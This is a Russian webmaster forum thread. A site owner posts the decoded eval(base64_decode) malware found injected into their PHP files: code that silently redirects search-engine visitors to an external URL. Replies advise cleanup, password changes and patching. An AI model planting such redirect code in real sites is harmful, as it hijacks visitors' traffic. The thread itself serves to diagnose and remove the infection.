Форум Сайтостроение Веб-строительство

Вирус base64_decode залез на сайт

12 3
Seliko09
На сайте с 09.01.2009
Offline
52
Seliko09
1277

Приветствую всех!

Почти во все php-файлы сайта залез код eval(base64_decode .

Собственно сайты перестали работать и я так понимаю - причина в этом.

Код раздекодили и вот его содержание: 


zö¥m«ë‡^r‡^

error_reporting(0);

$nccv=headers_sent();

if (!$nccv){

$referer=$_SERVER['HTTP_REFERER'];

$ua=$_SERVER['HTTP_USER_AGENT'];

if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {

if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

header("Location: http://at5.us/13140");

exit();

}

}

}

Кто разбирается? В этом причина? Как избавиться от вируса?

Один сайт на wordpress, другой на другом.

Кредиты до 15000$ (http://debtum.ru/?ref=113) Монетизация RU, UA трафа. Дорого.
CrePashOk
На сайте с 12.10.2011
Offline
21
CrePashOk
#1

С тем что на ВП могу помочь

Полный спектр услуг по WordPress (http://www.wpteam.net). icq: 55559939, skype: crepashok, portfolio: wpteam (http://www.wpteam.net/portfolio)
Sergey Petrov
На сайте с 01.02.2013
Offline
3
Sergey Petrov
#2

насколько я знаю лечение одно - удаление вражеского кода со всех файлов .php

руками или скриптом каким нибудь, замена всех паролей на админку, фтп, хостпанель

ну и проверить права у папок что бы ничего лишнего не было

ну или восстановить из бекапаа если свежий есть ну и пароли заменить все же надо

и права проверить

Неожиданно появился iframe HELP!!! [GOOGLE SEARCH] Дорвеи фейки
IL
На сайте с 20.04.2007
Offline
435
ivan-lev
#3
Seliko09:
Кто разбирается? В этом причина? Как избавиться от вируса?

Удалять код..

+ обновляться, латать "дыры", менять пароли.

Если заливали через уязвимость на сайте - скорее всего в логах сервера информация осталась.. искать по соседству с датой изменения файлов.

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )
Милованов Ю.С
На сайте с 24.01.2008
Offline
196
Милованов Ю.С
#4

Если юзер зашел на сайт с поисковиков - кидает его на http://at5.us/13140

То что удалите код - фигня. Зальют еще раз.

Узнаете как код попал в файлы - бинго, Вы победили!

1) На прямую через ФТП(сперли/сбрутили данные доступа)

2) через дыры движка/плагинов, 2 вероятней.

3) А может у них там уже шелл лежит, который запрятан так, что хрен найдешь с первого раза.

Тут за последнее стока тем, наверное надо написать полное руководство:)

Подпись))
Как найти файл на Вирус на Wordpress Joomla и PHPMyAdmin
CrePashOk
На сайте с 12.10.2011
Offline
21
CrePashOk
#5

Вы бы хоть ссылки на пациентов дали...

aeromouse
На сайте с 15.05.2006
Offline
245
aeromouse
#6

cms какая?

Sergey Petrov
На сайте с 01.02.2013
Offline
3
Sergey Petrov
#7
Милованов Ю.С:
Если юзер зашел на сайт с поисковиков - кидает его на http://at5.us/13140
То что удалите код - фигня. Зальют еще раз.
Узнаете как код попал в файлы - бинго, Вы победили!
1) На прямую через ФТП(сперли/сбрутили данные доступа)
2) через дыры движка/плагинов, 2 вероятней.
3) А может у них там уже шелл лежит, который запрятан так, что хрен найдешь с первого раза.

Тут за последнее стока тем, наверное надо написать полное руководство:)

да через фтп маловероятно, но доступы все же стоит поменять

когда с таким сталкивался

хостеры так и ничем не помогли (найти откуда и куда попадал злодей)

Милованов Ю.С
На сайте с 24.01.2008
Offline
196
Милованов Ю.С
#8
Sergey Petrov:
да через фтп маловероятно, но доступы все же стоит поменять
когда с таким сталкивался
хостеры так и ничем не помогли (найти откуда и куда попадал злодей)

Ну как по мне это не хостера задача, а владельца сайта, если конечно не через взлом ихнего сервака попали:)

Почему через ФТП маловероятно? Откуда такие суждения? Сами хакаете?:)

vlad00777
На сайте с 24.12.2009
Offline
119
vlad00777
#9
Милованов Ю.С:
Если юзер зашел на сайт с поисковиков - кидает его на http://at5.us/13140
То что удалите код - фигня. Зальют еще раз.
Узнаете как код попал в файлы - бинго, Вы победили!
1) На прямую через ФТП(сперли/сбрутили данные доступа)
2) через дыры движка/плагинов, 2 вероятней.
3) А может у них там уже шелл лежит, который запрятан так, что хрен найдешь с первого раза.

Тут за последнее стока тем, наверное надо написать полное руководство:)

Добавлю немного. Логи посмотрите сервера на предмет взлома. И айболитом прогоните, вдруг шелл живет.

Один сайт на wordpress, другой на другом.

Навеивает на мысль что фтп скорее всего, ну или хостер.

Верстка. Качественно! Адаптивная, резиновая, с параллаксом и прочими плюшками. В ЛС.
Sergey Petrov
На сайте с 01.02.2013
Offline
3
Sergey Petrov
#10
Милованов Ю.С:
Ну как по мне это не хостера задача, а владельца сайта, если конечно не через взлом ихнего сервака попали:)
Почему через ФТП маловероятно? Откуда такие суждения? Сами хакаете?:)

Да не просто сам в такое г. попадал

читал разбирался

вроде через уязвимости админки все лезет

почему то чаще всего joomla

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий